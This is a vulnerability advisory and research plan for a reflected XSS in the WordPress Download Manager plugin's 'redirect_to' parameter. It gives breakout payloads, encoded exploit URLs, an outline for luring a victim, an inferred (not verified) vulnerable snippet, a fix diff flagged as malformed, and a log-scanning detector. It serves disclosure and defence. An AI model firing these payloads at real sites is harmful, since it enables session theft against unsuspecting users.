CVE-2026-1666

Download Manager <= 3.3.46 - Reflected Cross-Site Scripting via 'redirect_to' Parameter

Severity: medium
CWE: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.1
Patched in: 3.3.47
Time to patch: 1d

Description

The Download Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirect_to' parameter in all versions up to, and including, 3.3.46. This is due to insufficient input sanitization and output escaping on the 'redirect_to' GET parameter in the login form shortcode. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <=3.3.46
Published: February 17, 2026
Last updated: February 18, 2026
Affected plugin: download-manager

Source Code: WordPress.org SVN

Research Plan
Unverified

Research Plan: CVE-2026-1666 Reflected XSS in Download Manager

1. Vulnerability Summary

The Download Manager plugin (<= 3.3.46) is vulnerable to Reflected Cross-Site Scripting (XSS) via the redirect_to GET parameter. This occurs because the plugin's login form shortcode retrieves the redirect_to value from the URL and reflects it into a hidden input field (or similar attribute) without sufficient sanitization or attribute escaping (e.g., missing esc_attr() or esc_url()). An attacker can provide a payload that breaks out of the HTML attribute to execute arbitrary JavaScript in the context of the victim's browser.

2. Attack Vector Analysis

  • Endpoint: Any public-facing WordPress Page or Post containing the [wpdm_login_form] shortcode.
  • Vulnerable Parameter: redirect_to (GET).
  • Authentication Level: Unauthenticated. No login is required to trigger the reflection.
  • Preconditions: A page must exist that renders the login form shortcode provided by the plugin.
  • Payload: A string designed to break out of an HTML attribute, such as: "><script>alert(document.domain)</script>.

3. Code Flow

  1. Entry Point: A user visits a URL such as http://site.test/login-page/?redirect_to=PAYLOAD.
  2. Shortcode Registration: The plugin registers the [wpdm_login_form] shortcode (likely in src/User/Shortcodes.php or download-manager.php).
  3. Processing Logic: The shortcode callback function (e.g., WPDM\User\Shortcodes::loginForm()) is invoked.
  4. Input Retrieval: Inside the shortcode handler or the associated view file (typically src/User/views/login-form.php), the code checks for $_GET['redirect_to'].
  5. Vulnerable Sink: The code reflects the value directly into the HTML output.
    • Vulnerable Code (Inferred):
      $redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();
      echo '<input type="hidden" name="redirect_to" value="' . $redirect_to . '" />';
      
    • Missing Protection: The $redirect_to variable is not wrapped in esc_attr() or esc_url().

4. Nonce Acquisition Strategy

This is a Reflected XSS vulnerability in a GET request that renders a form.

  • Verification: Viewing a page and rendering a shortcode does not typically require a WordPress nonce.
  • Action: No nonce is required for this exploitation. The payload is executed immediately upon the victim loading the malicious URL.

5. Exploitation Strategy

  1. Target Identification: Identify or create a page containing the [wpdm_login_form] shortcode.
  2. Payload Construction:
    • Base Payload: "><script>alert(document.domain)</script>
    • URL Encoded: %22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
  3. Execution:
    • Use the browser_navigate tool to visit the target page with the malicious parameter.
    • Example URL: http://localhost:8080/wpdm-login/?redirect_to=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
  4. Detection:
    • Use browser_eval to check if the script was successfully injected into the DOM.
    • Check if a specific global variable or "canary" set by the script exists.

6. Test Data Setup

  1. Install Plugin: Ensure download-manager version 3.3.46 is installed and active.
  2. Create Vulnerable Page:
    wp post create --post_type=page --post_title="Login" --post_status=publish --post_content='[wpdm_login_form]'
    
  3. Verify Slug: Identify the URL of the newly created page (usually /login/).

7. Expected Results

  • When the page is loaded with the malicious redirect_to parameter, the resulting HTML should contain:
    <input type="hidden" name="redirect_to" value=""><script>alert(document.domain)</script>" />
    
  • The browser will execute the <script> block, triggering the alert.

8. Verification Steps

  1. HTTP Response Check:
    Use the http_request tool to fetch the page and check the raw body for the unescaped payload.
    {
      "method": "GET",
      "url": "http://localhost:8080/login/?redirect_to=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"
    }
    
    Success Criteria: The response body contains the string value=""><script>alert(1)</script>".
  2. DOM Verification:
    Use browser_eval to confirm the presence of the injected script tag or its side effects.
    // Check whether the reflected payload produced an inline <script> element (the payload has no src attribute, so a src-based selector would never match)
    Array.from(document.scripts).some(s => s.textContent.includes('alert(')) || document.body.innerHTML.includes('><script>alert')
    

9. Alternative Approaches

  • Attribute Breakout via Events: If the <script> tag is filtered (unlikely in this context), try an event handler breakout:
    • Payload: x" onfocus="alert(1)" autofocus="
    • URL: ?redirect_to=x%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22
  • JavaScript URI: If the reflection is inside an href or action attribute rather than a value attribute:
    • Payload: javascript:alert(1)
  • HTML5 Autocomplete: If the input is visible, use onmouseover or onclick payloads.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Download Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirect_to' GET parameter in the login form shortcode. Due to a lack of proper sanitization and output escaping, unauthenticated attackers can inject arbitrary web scripts into a hidden form field, which executes in the context of the user's browser when they visit a specially crafted link.

Vulnerable Code

<?php
// Inferred from plugin structure and research plan
// src/User/views/login-form.php
$redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();
?>
<input type="hidden" name="redirect_to" value="<?php echo $redirect_to; ?>" />

Security Fix

--- a/src/User/views/login-form.php
+++ b/src/User/views/login-form.php
@@ -1,2 +1,2 @@
 $redirect_to = isset($_GET['redirect_to']) ? $_GET['redirect_to'] : home_url();
-<input type="hidden" name="redirect_to" value="<?php echo $redirect_to; ?>" />
+<input type="hidden" name="redirect_to" value="<?php echo esc_url($redirect_to); ?>" />
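Review bot: the context line `$redirect_to = isset(...)` is followed directly by the HTML `<input>` line with no closing `?>` between them, unlike the Vulnerable Code listing above, so the hunk as shown would not be valid PHP; confirm it was cut against the real view file. On the `+` line itself, esc_url() strips the double quote and angle brackets the reflected payload depends on and returns an empty string for javascript: URLs, so it closes the attribute breakout; it does not restrict the destination, so whatever code later redirects on this hidden field should still pass the value through wp_validate_redirect() or wp_safe_redirect() rather than trusting it.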

Exploit Outline

1. Locate a WordPress page that renders the [wpdm_login_form] shortcode provided by the Download Manager plugin.
2. Create a malicious URL targeting that page with a payload in the 'redirect_to' parameter, such as: ?redirect_to="><script>alert(document.domain)</script>
3. Send the link to a target user. When the victim visits the link, the unescaped payload is reflected into the HTML source as a hidden input value, breaking out of the attribute and executing the script.
4. No authentication or nonces are required, as the reflection occurs during the initial rendering of the public-facing login form.
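Added detection example, not part of the advisory or of the plugin: a Python check that scans web-server access-log lines for requests whose redirect_to value, after URL-decoding, carries the attribute-breakout or event-handler markers used by the payloads described above, so a site owner can spot attempts against the login page in their logs. The log lines, client addresses and page paths are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); lines 2 and 3 carry the two
# payload forms from the advisory, lines 1 and 4 are benign redirect_to values.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Feb/2026:10:01:02 +0000] "GET /login/?redirect_to=%2Fmy-account%2F HTTP/1.1" 200 5120
203.0.113.9 - - [17/Feb/2026:10:02:11 +0000] "GET /login/?redirect_to=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 5210
198.51.100.7 - - [17/Feb/2026:10:03:40 +0000] "GET /login/?redirect_to=x%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22 HTTP/1.1" 200 5201
198.51.100.8 - - [17/Feb/2026:10:04:00 +0000] "GET /wp-login.php?redirect_to=https%3A%2F%2Fexample.com%2Fwp-admin%2F HTTP/1.1" 200 3200
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers that mean the value is trying to leave the value="..." attribute or inject markup.
SUSPICIOUS = (
    re.compile("[\"'<>]"),             # attribute/tag breakout characters
    re.compile(r"\bon\w+\s*=", re.I),  # inline event handler such as onfocus=
    re.compile(r"^\s*javascript:", re.I),
)

def decode_param(value: str) -> str:
    """URL-decode repeatedly so double-encoded payloads (%2522 -> %22 -> ") are caught."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_redirect_to_xss(log_text: str) -> list:
    """Return one record per request whose redirect_to value looks like an XSS attempt."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        for raw in parse_qs(url.query, keep_blank_values=True).get("redirect_to", []):
            value = decode_param(raw)
            if any(p.search(value) for p in SUSPICIOUS):
                hits.append({"ip": m["ip"], "ts": m["ts"], "path": url.path, "redirect_to": value})
    return hits

if __name__ == "__main__":
    for hit in find_redirect_to_xss(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']} redirect_to={hit['redirect_to']!r}")
```

A benign redirect_to is a plain path or URL, so anything matching these patterns on a page that renders the login form shortcode is worth correlating with the plugin version in use.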
